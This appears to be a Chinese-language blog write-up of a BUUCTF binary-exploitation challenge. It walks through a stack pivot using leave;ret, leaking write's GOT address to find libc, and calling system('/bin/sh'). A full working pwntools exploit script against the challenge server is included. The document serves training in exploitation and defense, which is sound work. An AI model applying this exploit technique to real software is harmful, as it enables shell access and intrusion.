[BUUCTF]PWN——[Black Watch 入群题]PWN
[Black Watch 入群题]PWN——栈劫持
入群题密码在 /password.txt
Ubuntu 16
2020年02月27日:此入群题已作废,请看新版入群题。
解题步骤:
例行检查,32位程序,开启了nx保护
运行一下程序,两次输入,测试时发现输入长度过长,会报错
- 32位ida载入,首先shift+f12查看一下程序里的字符串,没有system函数和‘/bin/sh’的字符串,这边需要我们自己去想办法构造system(‘/bin/sh’)
- 从main函数开始看程序
- 主要部分在function函数里
- 一开始输出m1里的字符串,然后调用read函数给s写入参数,s在bss段上,而且允许我们写入0x200长度的数据,我们可以在这边写很多东西
- 之后输出m2里的内容
- 然后又是一个read函数,让我们读入0x20长度的数据给参数buf,ida给我们分析的buf参数的大小是0x18,我们可以溢出0x8字节,0x8字节,只够我们覆盖ret,没办法构造很长的rop链来攻击
- 我们之前看到的参数s,那边我们可以写入很长的数据,我们可以将我们的rop链布置在那里,由于这题需要我们自己构造system(‘/bin/sh’)
所以我们需要先来泄露一下程序的libc版本
payload=p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
r.recvuntil("What is your name?")
r.send(payload)
现在我们布置好的s是这样的
简单描述一下s参数里的布局
首先写入write函数的plt表地址(write函数的实际地址),去调用write函数
接着在函数返回地址处写入main函数地址,控制程序执行流
看一下write函数原型
ssize_t write(int fd,const void*buf,size_t count);
参数说明:
fd:是文件描述符(write所对应的是写,即就是1)
buf:通常是一个字符串,需要写入的字符串
count:是每次写入的字节数
最后的p32(1)+p32(write_got)+p32(4)
是我们一开始写入的调用write函数的参数,目的是调用write函数去打印write的got表(write函数的地址),32位程序,一次传入4字节
这句payload会泄露程序里的write函数的地址,利用libcsearcher就能获取这个程序libc的基址,接下我们就可以构造system(‘/bin/sh’)获取shell了
- 现在我们要想办法去调用我们布置好的栈,上面分析了,溢出长度不够我们完成利用,这边用到了一个叫栈劫持的方法,关于栈劫持的原理,看这里,从156:14开始
这篇文章也是讲栈劫持原理的
做栈劫持主要用到的是一个leave;ret指令,一般程序执行完成后都会调用leave;ret来还原现场
找一下程序里的leave;ret指令,leave_ret=0x8048408
payload1='a'*0x18+p32(s-4)+p32(leave_ret)
我们在给buf参数赋值的时候,溢出后将rbp覆写成s-4的地址,函数返回地址覆写成leave;ret指令的地址
理一下这样写程序的执行过程:
首先程序正常结束了,去调用程序本身的leave;ret来还原现场,
根据我们对栈的布局,
mov rsp,rbp
->将rsp指向了rbp,栈变成了这个样子
pop rbp
->rbp寄存器被我们设置成了参数s-4的地址,指向了我们布置好的栈上方,这边-4是因为我们第二次执行pop rbp给rbp赋值的时候,会将rsp+4,如果不减去4,rsp就在程序一开始的时候指向的不是栈顶,而是栈顶+4的位置,我们之后读取数据会丢失一开始的4字节,所以需要一开始的时候将指针往上抬4字节,栈变成了这个样子
ret(pop rip)
->去调用leave;ret指令
再次执行leave;ret指令
mov rsp,rbp
->rsp指向了参数s-4的位置,栈布局现在是这样
pop rbp
->弹出栈顶的值给rbp,之后栈变成了这样,我们成功将esp指针劫持到了我们布置好的栈上
ret(pop rip)
->将esp指向的输值弹给rip
接下来它就会去执行我们布置好的泄露libc的步骤,我们去接收它输出的write函数地址,就知道了libc版本,接下来就能去构造system(’/bin/sh‘)了,接下来在重复一下上述的控制流程,就能拿到shell了
(叙述的时候ebp=rbp,esp=rsp,中间说明没有保持一致,在查资料的时候,写的两个寄存器的名字不同,但都是这个作用)
完整exp:
from pwn import *
from LibcSearcher import *
#p=process('./spwn')
r=remote('node3.buuoj.cn',28433)
elf=ELF('./spwn')
write_plt=elf.plt['write']
write_got=elf.got['write']
main=0x8048513
s=0x0804A300
leave_ret=0x08048408
payload=p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
r.recvuntil("What is your name?")
r.send(payload)
payload1='a'*0x18+p32(s-4)+p32(leave_ret)
r.recvuntil("What do you want to say?")
r.send(payload1)
write_addr=u32(r.recv(4))
libc=LibcSearcher('write',write_addr)
libc_base=write_addr-libc.dump('write')
system=libc_base+libc.dump('system')
sh=libc_base+libc.dump('str_bin_sh')
r.recvuntil("name?")
payload=p32(system)+p32(0)+p32(sh)
r.sendline(payload)
r.recvuntil("say?")
r.sendline(payload1)
r.interactive()
最新文章
- tiledmap2
- MS CRM 2011的自定义和开发(11)——插件(plugin)开发(二)
- SQL Server 2008连接字符串写法大全(摘自网络)
- Cannot modify header information - headers already sent by
- UIP协议栈
- vc6.0调试
- IOS Cell重用机制
- (转)centos6.5安装VNC
- Selenium常用API用法示例集----下拉框、文本域及富文本框、弹窗、JS、frame、文件上传和下载
- 笔记10 在XML中声明切面(1)
- web 框架
- The frequent used operation in Linux system
- 非关系型数据库mongodb的语法模式
- 4990: [Usaco2017 Feb]Why Did the Cow Cross the Road II 线段树维护dp
- 涂抹mysql笔记-数据导出导入
- POJ 1182 食物链 (带权并查集)
- hdu 5441 (2015长春网络赛E题 带权并查集 )
- 使用npm国内镜像
- like模糊查询
- BZOJ4975: [Lydsy1708月赛]区间翻转( 博弈&;逆序对)